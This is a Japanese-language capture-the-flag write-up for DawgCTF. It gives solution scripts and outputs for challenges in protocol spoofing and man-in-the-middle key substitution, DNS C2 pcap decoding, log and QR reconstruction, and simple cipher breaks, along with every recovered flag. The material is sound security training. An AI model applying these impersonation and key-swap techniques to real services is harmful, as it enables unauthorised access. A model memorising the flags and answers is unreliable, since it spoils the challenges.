111111100100001001000000001111110000000000000000100000000000000000001110000000000000000110000011100000000000001100000000001000001000000011111111001000000100010001000101111111111111111111110100011001 111111101010110000100100000001110000000000000000000000000000000000001100000000000000000000000011100000000000011100000100001011000000001111111111110100000010101010101010111111111111111111111110111111 011111010001100000011000000011100000000000000000000000011111100000001100000000000000000000000011100000000000011100000100001010000000011111000001111100000001000100010001000011010111111101111111001110 111111111110101110000000000011100001100000000000000000100111000000011000000100000000000000000111000000000000011100000000001010000000111111000000011110000010101010100010101100111111110111111111111111 111111111111110001000010000011100001101111001111100001000011100000011000000000000000000000001111000000000000111000000000000000000000001111000000011110000000010000000100001100111111111111111111110101 111111111111111010100101000011100001110011001111000011000001100000011000000010111111000000111111000000000000111000000001000000010000001110000000111100000000000100001010000000111111111111111111111111 111101111111110100011000000011100001110011011100000101000011100000011000000011111111000111111111000000000000111000000001000000100000001100000000111100100010001000110001000101011111011111110111110100 111111111111101111000000000011100001110011011000000011000011000000011000000011111111000111111111100000011101111000000000110001000100001100000111111100000100010001101010110111001111111111111111111111 011111111111011011000000000011110011100011011111100011000011000000011000000011111000000111111011100000111111111000000000000000001000001101111111111000001000100010000100010000111111111111111111111011 111111111110111000100000111111111011000011001111100011001111000000011000000011110000000000000011110000110111110000000000000000000000001111111111111110000100000000001010100011000011111111111111111111 100111110111100100000000111111111001000111000001110111111110000000011000000011110000000000000011110001110001110000000000000000000000001100000000001110001100000100000001000000010001111101111111011110 111111111110101110100001011111111000000110001001110111111100000000011111000111110000000000000011000001100001110000000000000000000000001100000000001110001110000100000000000000001010101111111111111111 011111111111011001000110000000000000000000001111100111101000001111111111100111100000000000001110100001100001100000000000000000000000001100000000001110001110001100000000010000000000010001111111111111 111111111111111010101010000000000000000000001111100111100000000111111111100111100000000000111001100001000000011000000001000100000000011100000000010110001110001100000000000000000000000010111111111111 111101111111100100011111000000000000000000000000000110000000000000000011100011100000011100001111100001100111111000000000000000000000001110000000001110000111111100000000000000000000000000011011111101 111111111111111110101110100000000000010001000000001110000000000000000100010000000000011111111100000001111111111000011000011111111100010010000000111100000011111100000000000000000000100000111111111111 111111111111111101001110010110001111100011110000001100000000000000001000100010001000011111110000000000111111111000011111111111111100011100001111111100000010110000000000000000000000000000000110011111 111111111111111011111110101100000000000000000000001100000000000000000000000000000000000000000000000000000000000000001111111111111100011111111111111000000111110000011111111000001110000000111111111111 011111110111110100111001011100000000000000000000001100000000000000000000000000000000000000000000000000000000000000000111111000000000000111111111100000001111100000011111111111111111111000011001100101 111111111111111110101011101010100000000000000000001100000000000000000000000000000000000000000000000000000000000000000000000000000000000000111100000000111110000000001111111111111111111000101011111001 111111111111111111000110010101010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000011111000000000000000011100111111100000000000111111 111111111111111111101101101010100110000000000000000000000000000100010001000000000000000000000000000000000000000000000000000000000000000000000000000111100000000001111000000000000000000000101011111111 111111010111011111011001010101000110000111000000000001100000011110100000111111000000011111100000011111110000000011111000000000000000000000000000011110000000000001111111100000000000000000011011100100 111111101010111111101011111110001110000111001011000001100001111111000000111111110000111111110011111111111100000011111100000000000100000000000000111100000011111000000111100000000000000011011000111111 111111110101111111010110111100001100000111000111000001100001111011100001000001110001110011111011111111111100000111011100000011100000000000000001100000000111111000000011100000000000010011000000011001 111111111010111111101110111110001100000111000111000001110011100001100000000000111001110001111000000110111100001110011100000011100000100000000000000000000111111000000011100011000010101000001100001111 111111110111011111111101111100001100000111000111100001110011100001110000000000011011110000111000000111000000011100011100000011100000100000111111100000001111111000000011100011010001000110001101010110 111101111111111110101011101010001100000111000111100001110001100000110000000000111011110000111000000111000000111000011100000011100001000001111111111000001111111000000011100000011010101110110010101111 010111011111110101010111010101001100000111000111110001110001100000110000000001110000110001111000000111000001110000011100000111100011000001100111111100001111110000000011100000000011010100110101010001 011101111111111010101110101010001100000111000111110011110001100000110000000111100000110111111000000111000001111111111100000111100000000000000001111100001111110000000111100000110000101111101010011111 110111011111010111111101000110001100000111000111111011110001100000111001111111110001111111110000000111000001111111111111100111000001001000000000011100001111100000000111100000010001011101110101110110 111101110111001111111111101010001100000111000111011011100001100001111001111111110001111111100000000111000000000111111111100111001101000000000000111100001111000010000111100000101010100011111111111111 110111011111011111111111110001001100000111000111011111100001100001111000000000110001111111100000000111000000000000111011100111001100000000011111111100001100000000000111111100000100000011011111111001 111101110111111111111111101010000111000111000111001111100001100011110000000000110001100111110000000111000000000000111000000111000000100000011111111000001100000000000111111100101110100111011111111111 000111111111011101111111010110000011001111000111000111100001100111110000000000110001100011111000001111000000000000111000000111010000110000011111111100000000000000000111111100010111010111111111011110 111101110111111111111111111010000001111111000111000011100011101111100000000001110000100000011100000011000000000000111000000111011000000000000000111100000000000000000111100000001111111110111111111111 011001011101111111000011111000000110000000001111000011100011111111000001100111100001000000100100001100000000000001111000000111000000000000000000111100000000000000001111000000000111111101011111111111 111111110111101111100011111001000011111100001011000000000101111110000001111111000001100000011000001110000000000000111000000011111111110001100001111000000000001000001111000000100011111111101111111111 100111111101110111110101111111010000000000001100000000000110100000000001000100000000000000000000000000000000000001001000000110111111110000111011111000011100001000001110000010100011011111110111111101 111111110111001011110011111110001100000000000111000000000111110000011000000000000000000000000000000000000000000001110000101111000001110000011111110000111100000000011110000110000011111111111011111111 011111101101110111110010111101101111110000000000000000000000000000011100000000001110000000000000000000000000000000000100010111100100000000100000000000111100000000011110110000000111111111111101111111 111111110111011011110011111111101111110000000000000000000000000000011100001100001111000000001010101010101000000010101010101010101010000000011111000000000000000000111110000000000001111111111111111111 110111011101110111110111111110011111110000011100000100000000000000011100111100011111000010010001000100010001000100010001000100010001000000000000000000000000000001111000100001011000111101111111011111 111111110111011111111011101010111011111110001101100000000000000000011110101010111010101010101010101010111010101010101010101010101010101011100000000000000000010111110100100000011010111111111111011111 111111100101111111111111110001110111111001110010010110100000000001011101010101110111010101000100010001101100010001000100010001000100010011100000000000000000001000001100000000000111111111111111111111 111111111111011111111111111001101011111110100101101111000000001010111110101010111010101110101010101011111010101110101010101010101010101011101000000000000000000011111000000000111111111111111111111111 111101111111111111110111110110010111011101011001101110010001000111110101010101110101111101011011000101110111011110010101010111110101010111110001000000000000000000000000000010111111011111110111101101 111111111111011111111111101010011111101111111011111110111010101011111011111110101101100111111000110111111111111111111000111110001111101111111010101000000000001010110000101110111111111111111111111111 011111111111111111111111110101101111011011110110111101101111010011111100110110101100000111110000110011111111111111110000111111111111010111110100011000000000010011110000100000111111111111111111111011 111111111111111111111111101011110011101011111110111111101111101011111010101011000000110111111100011111111111101111111100111111111111101111111010111010101010110011110000110010111111111111111111111111 011111110111111101111111011101011111100111111001111110011111100111111101110111011000110111110101111101001111111111110101111111111111000111110001111100010000110111111001010000110101111101111101011110 111111111111111111111111111111111111111110101011111010111111111110111111011101111011000110101010101010101010101011111111111111111110101111101010111010101011101110111011111010111111111111111111111111 111111111111111111111111111111100110011111110111110101111111110111111101110111011101001101010101111111010101111111111111111101011111110111110101111101010111010101111101111101011111111111111110111111 111111111111111111111111011111111111111111111111111111111111111111110111011101111010101010101011111111111111111111111111111111111111111111111111111111111010101110111111011101111111011111111111111111 111101111111011111110111111101111111011110111111110111011111011111110111111101111111011101011111111101111111011111110111111101111111010111110111111111011101110111011101111101011111011111110111101101
この0, 1のテキストで、フラグが描かれている。
DawgCTF{Th1s_w4s_1nspIr3d_By_UND3RT4L3!}
Protocol Analysis 1: Can You Hear Me (Protocol Analysis 50)
Aliceから受信したデータをBobに送信すればよい。
#!/usr/bin/env python3 import requests import json start_url = 'https://protocols.live/model/1' alice_url = 'https://protocols.live/alice' bob_url = 'https://protocols.live/bob' headers = {'Content-Type': 'application/json'} r = requests.post(start_url) conn_id = json.loads(r.text)['conn_id'] content = '' data = {'conn_id': conn_id, 'content': content} json_data = json.dumps(data) r = requests.post(alice_url, data=json_data, headers=headers) print(r.text) content = json.loads(r.text)['content'] data = {'conn_id': conn_id, 'content': content} json_data = json.dumps(data) r = requests.post(bob_url, data=json_data, headers=headers) print(r.text)
実行結果は以下の通り。
{"content":"t:Hello|n:bob|t:this is|n:alice|t:give me the flag"}
{"content":"t:here it is|t:DawgCTF{PR0T0C0LS_R_3ZPZ}"}
DawgCTF{PR0T0C0LS_R_3ZPZ}
Protocol Analysis 2: Liar (Protocol Analysis 75)
Aliceから受け取ったデータを元に、"alice"を"charlie"に書き換えることによってCharlieになりすましフラグを取得する。
#!/usr/bin/env python3 import requests import json start_url = 'https://protocols.live/model/2' alice_url = 'https://protocols.live/alice' bob_url = 'https://protocols.live/bob' headers = {'Content-Type': 'application/json'} r = requests.post(start_url) conn_id = json.loads(r.text)['conn_id'] content = '' data = {'conn_id': conn_id, 'content': content} json_data = json.dumps(data) r = requests.post(alice_url, data=json_data, headers=headers) print(r.text) content = json.loads(r.text)['content'].replace('alice', 'charlie') data = {'conn_id': conn_id, 'content': content} print(data) json_data = json.dumps(data) r = requests.post(bob_url, data=json_data, headers=headers) print(r.text)
実行結果は以下の通り。
{"content":"t:Hello|n:bob|t:this is|n:alice|t:give me the flag"}
{'conn_id': 726972395853216348, 'content': 't:Hello|n:bob|t:this is|n:charlie|t:give me the flag'}
{"content":"t:here it is|t:DawgCTF{CH4NG3_0F_PL4N5}"}
DawgCTF{CH4NG3_0F_PL4N5}
Protocol Analysis 3: Missing (Protocol Analysis 100)
Aliceからはデータを受信せずに、Bobに既定のデータを送信する。
#!/usr/bin/env python3 import requests import json start_url = 'https://protocols.live/model/3' alice_url = 'https://protocols.live/alice' bob_url = 'https://protocols.live/bob' headers = {'Content-Type': 'application/json'} r = requests.post(start_url) conn_id = json.loads(r.text)['conn_id'] content = 't:Hello|n:bob|t:this is|n:alice|t:give me the flag' data = {'conn_id': conn_id, 'content': content} json_data = json.dumps(data) r = requests.post(bob_url, data=json_data, headers=headers) print(r.text)
実行結果は以下の通り。
{"content":"t:here it is|t:DawgCTF{N0_0N3_3LS3_H0M3}"}
DawgCTF{N0_0N3_3LS3_H0M3}
Protocol Analysis 4: Real Security! (Protocol Analysis 150)
Aliceから受信したk(暗号鍵), d(nonce)とBobから受信したd(暗号フラグ)を元に、ユーティリティを使ってフラグを復号する。
#!/usr/bin/env python3 import requests import json def get_value(data, key): pairs = data.split('|') for pair in pairs: k = pair.split(':')[0] if k == key: return pair.split(':')[1] return None start_url = 'https://protocols.live/model/4' alice_url = 'https://protocols.live/alice' bob_url = 'https://protocols.live/bob' util_url = 'https://protocols.live/util' headers = {'Content-Type': 'application/json'} r = requests.post(start_url) conn_id = json.loads(r.text)['conn_id'] content = '' data = {'conn_id': conn_id, 'content': content} json_data = json.dumps(data) r = requests.post(alice_url, data=json_data, headers=headers) print(r.text) content = json.loads(r.text)['content'] k = get_value(content, 'k') d = get_value(content, 'd') data = {'conn_id': conn_id, 'content': content} json_data = json.dumps(data) r = requests.post(bob_url, data=json_data, headers=headers) print(r.text) content = json.loads(r.text)['content'] d2 = get_value(content, 'd') url = util_url + '/sym_decrypt' content = f'k:{k}|d:{d}|d:{d2}' data = {'conn_id': conn_id, 'content': content} json_data = json.dumps(data) r = requests.post(url, data=json_data, headers=headers) print(r.text)
実行結果は以下の通り。
{"content":"t:Hello|n:bob|t:this is|n:alice|t:send me the flag encrypted under this symetric key and nonce|k:36db2d293d6e2c4cf1ad1178321c19ebb7d851cd6f11927d6dbf476f34efea6e|d:4f16fe582f96a422fdb639fd"}
{"content":"t:here it is|d:00be2ffbc8123c9a695b82981456d5fa644e93f6afd6a23e971a675795acc3a6bb5ffe9fd67e24a2943ed389"}
{"content":"t:DawgCTF{N0T_S0_S3CR3T_K3Y}"}
DawgCTF{N0T_S0_S3CR3T_K3Y}
Protocol Analysis 5: Is This Real (Protocol Analysis 150)
Aliceから受信した公開鍵は使わずに、ユーティリティを使って公開鍵、秘密鍵を生成し、その公開鍵をBobに送信する。ユーティリティを使って、Bobから受信した暗号フラグを秘密鍵で復号する。
#!/usr/bin/env python3 import requests import json def get_value(data, key): pairs = data.split('|') for pair in pairs: k = pair.split(':')[0] if k == key: return pair.split(':')[1] return None def get_keys(data): pairs = data.split('|') for i in range(len(pairs)): if pairs[i] == 't:public': pubkey = pairs[i + 1][2:] elif pairs[i] == 't:private': privkey = pairs[i + 1][2:] return pubkey, privkey start_url = 'https://protocols.live/model/5' alice_url = 'https://protocols.live/alice' bob_url = 'https://protocols.live/bob' util_url = 'https://protocols.live/util' headers = {'Content-Type': 'application/json'} r = requests.post(start_url) conn_id = json.loads(r.text)['conn_id'] content = '' data = {'conn_id': conn_id, 'content': content} json_data = json.dumps(data) r = requests.post(alice_url, data=json_data, headers=headers) print(r.text) alice_content = json.loads(r.text)['content'] url = util_url + '/gen_asym_key_pair' content = '' data = {'conn_id': conn_id, 'content': content} json_data = json.dumps(data) r = requests.post(url, data=json_data, headers=headers) print(r.text) key_content = json.loads(r.text)['content'] pubkey, privkey = get_keys(key_content) content = alice_content.split('|k:')[0] + '|k:' + pubkey data = {'conn_id': conn_id, 'content': content} json_data = json.dumps(data) r = requests.post(bob_url, data=json_data, headers=headers) print(r.text) content = json.loads(r.text)['content'] d = get_value(content, 'd') url = util_url + '/asym_decrypt' content = f'k:{privkey}|d:{d}' data = {'conn_id': conn_id, 'content': content} json_data = json.dumps(data) r = requests.post(url, data=json_data, headers=headers) print(r.text)
実行結果は以下の通り。
{"content":"t:Hello|n:bob|t:this is|n:alice|t:send the flag encrypted under this asymetric key|k:30818902818100c601a069ac5c51cfb2914d32ac8f7e794dc31fb7943b448a54dc80e8b41bfde4bb2c46758269f76890e8e5ba8ef4ba5c8d8556f3e03c3dcf8c12603cb17abb5625a8a2043b7bd83730e034581597df8707513115da965a55b207e47dfc26b867e53f1b9aafbfc3c0c11f7560a853084097e0cce434798c2ff16bc515dfb5ed0f0203010001"}
{"content":"t:public|k:30818902818100f6c5e18fe43125a5412b644abddf031a8b41e1f904491434dd325392bf355e8f955575dfe299f5b5e769f2ca0aa1969a0736f816e5c908c522c563df5bb56f003edd85bed9b57f791cc6ea2aa835f5bf7207365ffd9b88301fec649b9bd17c21d4d07968f6654b4039b8e4bdf1bd2f364b3f4ebeb585b5fbffdb0632fff81bdf0203010001|t:private|k:30820276020100300d06092a864886f70d0101010500048202603082025c02010002818100f6c5e18fe43125a5412b644abddf031a8b41e1f904491434dd325392bf355e8f955575dfe299f5b5e769f2ca0aa1969a0736f816e5c908c522c563df5bb56f003edd85bed9b57f791cc6ea2aa835f5bf7207365ffd9b88301fec649b9bd17c21d4d07968f6654b4039b8e4bdf1bd2f364b3f4ebeb585b5fbffdb0632fff81bdf020301000102818100aad9ea0733980b5654be741b8345a9e270d3d65e0fe780c3f0f96cff46beee8f3e7702bb5529ff02480c047a79cdd27525d59b024f6956571671cf69cf16d897d8e4c13df0ed2fa5c060cb9448fdcc478ed5811710a7260f87aafbb1185abaeb685170d66f4fbad9a12774ad7d7f41dff1917381148f24c671e2a9c544953541024100fbe47f81323ddacf1e5e58d456a751d5def629a0df98f2fecfe8877c814a4d214559fef5a26b9d489daab3f0f81ebe1922d69a2793c3e1a636804b1879de2baf024100facc03027adddc97f07273e705751bd4bfcd38dd1f7123abfb7ebd2184a4cc01c5a7b14d7df086fef49846197ac57444429197b348faa306bfed104c54532ed102405848202beea8e11c401f7ef084a245bb38567c0686f73b0af56120c3112932591bce4bde591b705777f2d0f7fe6dffe01d66ab467db2644e75c187103ffe0ebf024049f7dbb7628786e5251c8c84897e85abd4b9f1587e4a7f2bdd2bff1a20a5fe2953a366cea523489d6f846dc05c0e5a813b64f76a004f33bfece13d5a55d086d1024056b54d4373a3b9896f9f0ce6b34a3d4a2f5a765757694b58b8f287b42a85002c4eeccaec21e3c6cfc61a5850eb0842d7bba7ed5d0ce89884268159660e67a562"}
{"content":"t:here it is|d:c544162284a48a08b1e2ec68d1d3a1c3d9ca8a876183995189b406c1d08ada99bc57eb4fda29ada55fa7499df1a65b51908375b12f4b576cc642eb1858d2492a899ed3b60215ded43121f790bf5198c9d7f6f92353541d62b74136f890a189c120c410bf8a9486b2cea5462388d9dbd55ccceb160920dcfc39e95c239c92a9f4b91865928b383060f704be5549bc9ea481949af50c5d86d624116807728a08490eec92bdbdacc382f0bd850f36"}
{"content":"t:DawgCTF{C3RT1F13D_1NS3CUR3}"}
DawgCTF{C3RT1F13D_1NS3CUR3}
I Love Bacon (Fwn 200)
pcapの通信はdns通信だけで、そのdns通信でホスト名のドメイン部分を取り除いた部分はbase32文字列のようになっている。printableにデコードできるものを連結する。
#!/usr/bin/env python3 from scapy.all import * from base64 import * def is_printable(s): for c in s: if c < 32 or c > 126: return False return True packets = rdpcap('dns_c2.pcap') flag = '' for p in packets: if p[IP].dst == '10.1.1.53': qname = p[DNSQR].qname.decode() b32 = qname.split('.')[0] try: dec = b32decode(b32) if is_printable(dec): flag += dec.decode() except: continue print(flag)
DawgCTF{s1zzlin_succul3nt_c2_b4con}
Modem Metamorphosi (Fwn 250)
pcapファイルを解析して、ルーターのメーカー、モデル、旧ファームウェアバージョン、新ファームウェア名、新ファームウェアバージョンを答える問題。
httpでフィルタリングする。/upgrade.cgiへのPOSTからファームウェアの名前は以下であることがわかる。
openwrt-24.10.0-bcm47xx-generic-linksys_wrt610n-v1-squashfs.bin
検索すると、以下のページが見つかる。
https://openwrt.org/toh/hwdata/linksys/linksys_wrt610n_v1
ここから以下のことがわかる。
・Manufacturer:Linksys ・Model:WRT610N ・NewFirmwareName:OpenWrt ・NewFirmwareVersion:24.10.0
また/へのGETのレスポンスから現在のバージョンが以下であることがわかる。
1.00.00 B18
DawgCTF{Linksys_WRT610N_1.00.00 B18_OpenWrt_24.10.0}
The Step After the PCAP (Fwn 350)
ネットワークログが添付されている。そのログを見ると、Payload Fragmentに値が設定されている送信先アドレスは45.76.123.45しかない。これらのデータのPayload Fragmentを時系列に並べる。
#!/usr/bin/env python3 with open('network_forensics.log', 'r') as f: lines = f.read().splitlines()[9:6665] LINE_SIZE = 13 logs = [] for i in range(0, len(lines), LINE_SIZE): logs.append(lines[i:i + LINE_SIZE - 1]) fragments = {} for log in logs: if log[10] != 'Payload Fragment: -': recordno = int(log[0].split('#')[1].split()[0]) timestamp = log[1].split(': ')[1] dstip = log[3].split(': ')[1] fragment = log[10].split(': ')[1] assert dstip == '45.76.123.45' fragments[timestamp] = fragment fragments = sorted(fragments.items()) flag = 'Dawg{' for k, v in fragments: flag += v flag += '_' flag = flag[:-1] flag += '}' print(flag)
Dawg{HBRPO_IG8F1_CBFNO_6B9M8_0O2RA_K1VRJ_NVGFY_GWWQC_38HYF_9SXME_COSFO_GYR3X_KXWNR_EK8PK_3YR9O_UDOCU_ZRENU_N5Z3J_QIP98_Q1ZXO_I65FD_HJK1E_YY37Q_9AH8R_VHS1K_3AQ6L_6GT6M_JXK87_AU5BH_XTPDP_FF5E8_II49K_Q71N8_MTZX2_72HPO_EVB9O_OAEDO_ECVE6_PR5N8_I4P40_MGG1W1}
Stomach Bug (Fwn 400)
指定されたURLにアクセスしてダウンロードしようとしても全然終わらない。1分くらいダンプして途中までデータを取得してみる。
$ curl http://stomachbug.umbccd.net > dump.txt % Total % Received % Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed 100 339k 0 339k 0 0 5619 0 --:--:-- 0:01:01 --:--:-- 5746^C $ head -n 330 dump.txt !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefg |000|89504e470d0a1a0a0000000d494844520000027100000271080000000008e6bbe40 !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefgh |001|00014fa4944415478daeddac192db38804441ffff4fcf1ef7b266d703e48d682a71 "#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghi |002|ea194b14092414512afcf9cf30fe3fc71f53601067106718c419c41906710671067 : abcdefghijklmnopqrstuvwxyz{|}~ !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHI |160|0ce20ce20c83388338c320ce20ce20ce30883388330ce20ce20c833883388338c32 bcdefghijklmnopqrstuvwxyz{|}~ !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJ |161|0ce20ce30883388338cbf8fff01ece54b872a58eb450000000049454e44ae426082 cdefghijklmnopqrstuvwxyz{|}~ !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJK |000|89504e470d0a1a0a0000000d494844520000027100000271080000000008e6bbe40 defghijklmnopqrstuvwxyz{|}~ !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKL |001|00014fa4944415478daeddac192db38804441ffff4fcf1ef7b266d703e48d682a71 efghijklmnopqrstuvwxyz{|}~ !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLM |002|ea194b14092414512afcf9cf30fe3fc71f53601067106718c419c41906710671067
どうやら同じデータを繰り返し送信していたようだ。その内容はPNGフォーマットになっているので、復元する。
復元した画像にはQRコードが描かれているので、コードリーダで読み取る。すると、またPNGフォーマットになっているようなので、デコードする。その際、0xc2や0xc3の次に0x80以上の値が来る場合は、以下のような修正をする。
c2 xx -> xx c3 xx -> xx + 0x40
先ほどのQRコード復元と合わせ、作成したコードは次の通り。
#!/usr/bin/env python3 from PIL import Image from pyzbar.pyzbar import decode with open('dump.txt', 'r') as f: data = f.read().splitlines() data = [data[i] for i in range(1, len(data), 2)] data = data[:162] bin_png = '' for d in data: bin_png += d.split('|')[-1] png = bytes.fromhex(bin_png) with open('qr.png', 'wb') as f: f.write(png) img = Image.open('qr.png') data = decode(img)[0].data png = b'' i = 0 while i < len(data): if data[i] == 0xc2: png += bytes([data[i + 1]]) i += 2 elif data[i] == 0xc3: png += bytes([data[i + 1] + 0x40]) i += 2 else: png += bytes([data[i]]) i += 1 with open('qr2.png', 'wb') as f: f.write(png)
復元した画像にはまたQRコードが描かれているので、コードリーダで読み取ると、以下の文字列だった。
RGF3Z0NURnsxX0JMNE0zX1RIMFMzX0g0Wk00VF9UUjVDSzNSNX0=
base64デコードする。
$ echo RGF3Z0NURnsxX0JMNE0zX1RIMFMzX0g0Wk00VF9UUjVDSzNSNX0= | base64 -d DawgCTF{1_BL4M3_TH0S3_H4ZM4T_TR5CK3R5}
DawgCTF{1_BL4M3_TH0S3_H4ZM4T_TR5CK3R5}
Artemis Gordon (Cryptography 100)
暗号はこの画像。
Lunar Alphabetなので、https://www.dcode.fr/lunar-alphabet-leandro-katzで復号する。
MOONMAN
DawgCTF{MOONMAN}
I Hate Physics! (Cryptography 150)
テキストの行頭と行末の文字を連結していく。
DawgCTF{therm0dyn4mic5sucks!}
Vault Breaker (Cryptography 150)
添付のPDFにはこのような画像が描かれていた。
Dada Urka Cipherであると推測できるので、https://www.dcode.fr/dada-urka-cipherでデコードする。
EXTREMELYLONGPASSWORD
DawgCTF{EXTREMELYLONGPASSWORD}
Six Seven (Cryptography 200)
暗号化処理の概要は以下の通り。
・flagの先頭8バイトが"DawgCTF{"であることをチェック
・ct = encrypt(flag)
・start: ランダム1バイト文字列
・key = start
・iが1以上flagの長さ未満に対して以下を実行
・key += gen(key[i-1]).to_bytes(1, "big")
・keyとflagをXORして返却
・ctを16進数表記で出力フラグが"D"から始まることからstartの値は割り出せる。startの値がわかれば、keyを算出でき、XORでフラグを復号できる。
#!/usr/bin/env python3 from Crypto.Util.strxor import strxor def gen(start): return (((6 * 7) * (start - 6) * 7) + ((start * 6) - 7) * (start ^ 6)) % 255 with open('output.txt', 'r') as f: ct = bytes.fromhex(f.read().split(' = ')[1]) start = ord('D') ^ ct[0] key = bytes([start]) for i in range(1, len(ct)): key += gen(key[i - 1]).to_bytes(1, 'big') flag = strxor(key, ct).decode() print(flag)
DawgCTF{please_use_secrets_in_your_stream_ciphers_69bfe194af43f0cd}
